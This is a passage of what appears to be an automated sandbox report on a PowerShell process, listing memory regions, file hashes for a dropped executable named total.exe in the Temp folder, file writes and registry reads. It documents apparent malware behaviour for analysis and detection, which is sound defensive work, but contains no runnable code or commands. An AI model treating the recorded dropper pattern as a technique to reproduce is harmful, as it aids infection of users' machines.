| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00346fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00351fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00360000 | 0x00362fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x00370fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00517fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x01aaffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01ab0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ac0000 | 0x01ac0000 | 0x01bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001bc0000 | 0x01bc0000 | 0x01bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bd0000 | 0x01bd0000 | 0x01bd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01beffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01bf1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c00000 | 0x01c00000 | 0x01c00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01c11fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x01c20000 | 0x01c23fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001c30000 | 0x01c30000 | 0x01c30fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01cbffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001cc0000 | 0x01cc0000 | 0x01d9efff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x01da0000 | 0x01dbcfff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db | 0x01dc0000 | 0x01deffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01df0000 | 0x01df3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01e00000 | 0x01e65fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e70000 | 0x01e70000 | 0x01e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e82fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01f2ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0227ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002300000 | 0x02300000 | 0x026f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0271ffff | Private Memory | - |
|
|
|
- |
| l_intl.nls | 0x02720000 | 0x02722fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x02730fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x02740000 | 0x02744fff | Memory Mapped File | r |
|
|
|
- |
| sortkey.nlp | 0x02750000 | 0x02790fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027a0000 | 0x027a0000 | 0x0281ffff | Private Memory | rw |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02820000 | 0x02827fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02840fff | Pagefile Backed Memory | r |
|
|
|
- |
| mscorrc.dll | 0x02840000 | 0x02893fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000028a0000 | 0x028a0000 | 0x028b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000028d0000 | 0x028d0000 | 0x0294ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x02a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x1abbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001abc0000 | 0x1abc0000 | 0x1b28ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b290000 | 0x1b290000 | 0x1b390fff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x1b3a0000 | 0x1b45ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000001b490000 | 0x1b490000 | 0x1b50ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b510000 | 0x1b7f1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b800000 | 0x1b800000 | 0x1b8fffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x756a0000 | 0x75768fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77930000 | 0x77a4efff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a50000 | 0x77b49fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77d20000 | 0x77d26fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f120000 | 0x13f196fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee5610000 | 0x7fee57a4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fee57b0000 | 0x7fee591bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fee5920000 | 0x7fee5fc4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee5fd0000 | 0x7fee60e7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee60f0000 | 0x7fee6305fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee6310000 | 0x7fee63f4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee6400000 | 0x7fee64a9fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee64b0000 | 0x7fee6518fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee6520000 | 0x7fee684dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee6850000 | 0x7fee73acfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee73b0000 | 0x7fee7dd2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee7de0000 | 0x7fee8cbbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee8cc0000 | 0x7fee965cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fee9780000 | 0x7fee97bdfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee97c0000 | 0x7fee9871fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee9d60000 | 0x7fee9d91fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x7fee9e20000 | 0x7fee9e26fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7feea9c0000 | 0x7feeaa58fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef1d00000 | 0x7fef1d6efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef7ab0000 | 0x7fef7abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef7ac0000 | 0x7fef7af3fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef7fc0000 | 0x7fef803ffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef8040000 | 0x7fef804efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefaad0000 | 0x7fefab26fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb9f0000 | 0x7fefba08fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefba50000 | 0x7fefba5afff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbd50000 | 0x7fefbd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc3f0000 | 0x7fefc445fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc450000 | 0x7fefc57bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc5d0000 | 0x7fefc7c3fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcc60000 | 0x7fefcc6bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefce40000 | 0x7fefce5dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd090000 | 0x7fefd0d6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd390000 | 0x7fefd3a6fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd890000 | 0x7fefd8b2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd990000 | 0x7fefd99efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdaa0000 | 0x7fefdaaefff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefdb50000 | 0x7fefdb69fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd20000 | 0x7fefdd8afff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefde30000 | 0x7fefde65fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefde70000 | 0x7fefde7dfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7fefdfc0000 | 0x7fefe096fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefe1e0000 | 0x7fefe20dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefe210000 | 0x7fefe276fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefe280000 | 0x7fefe2f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefe300000 | 0x7fefe408fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefe410000 | 0x7fefe4eafff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefe4f0000 | 0x7fefe6f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefe700000 | 0x7feff487fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feff8f0000 | 0x7feff941fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff9a0000 | 0x7feffaccfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feffaf0000 | 0x7feffcc6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feffcd0000 | 0x7feffd68fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feffd70000 | 0x7feffe38fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feffe40000 | 0x7feffe5efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffe70000 | 0x7feffe70fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 72 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | 804.65 KB |
MD5:
23241a6021334635dc512f3bfd812f1c
SHA1: c70bf8abb2c0adad8696cb688b13155fa26f0e5b SHA256: 8a674c5b1324ceb20ac3a93982268cd777f9abc6fe9ec7310be4dbe7bf8aad3e SSDeep: 24576:SdeUKz6LtsChewe/tOYhJvo+Ihjr5ZFAtleyP:PUZts2eweNhJvtIRtile6 |
|
|
Host Behavior
File (265)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
5 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | C:\Users\aDU0VK IWA5kLS | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
44 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
67 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
4 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 4096 |
|
4 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 7327 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 23360 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 22184 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 35040 |
|
2 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 54020 |
|
3 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 11964 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 65536 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 14764 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 16060 |
|
2 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 24820 |
|
2 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 26280 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 14600 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 8760 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 49924 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 42340 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 64240 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 43800 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 52560 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 39420 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 5840 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe | size = 777 |
|
1 |
Registry (158)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
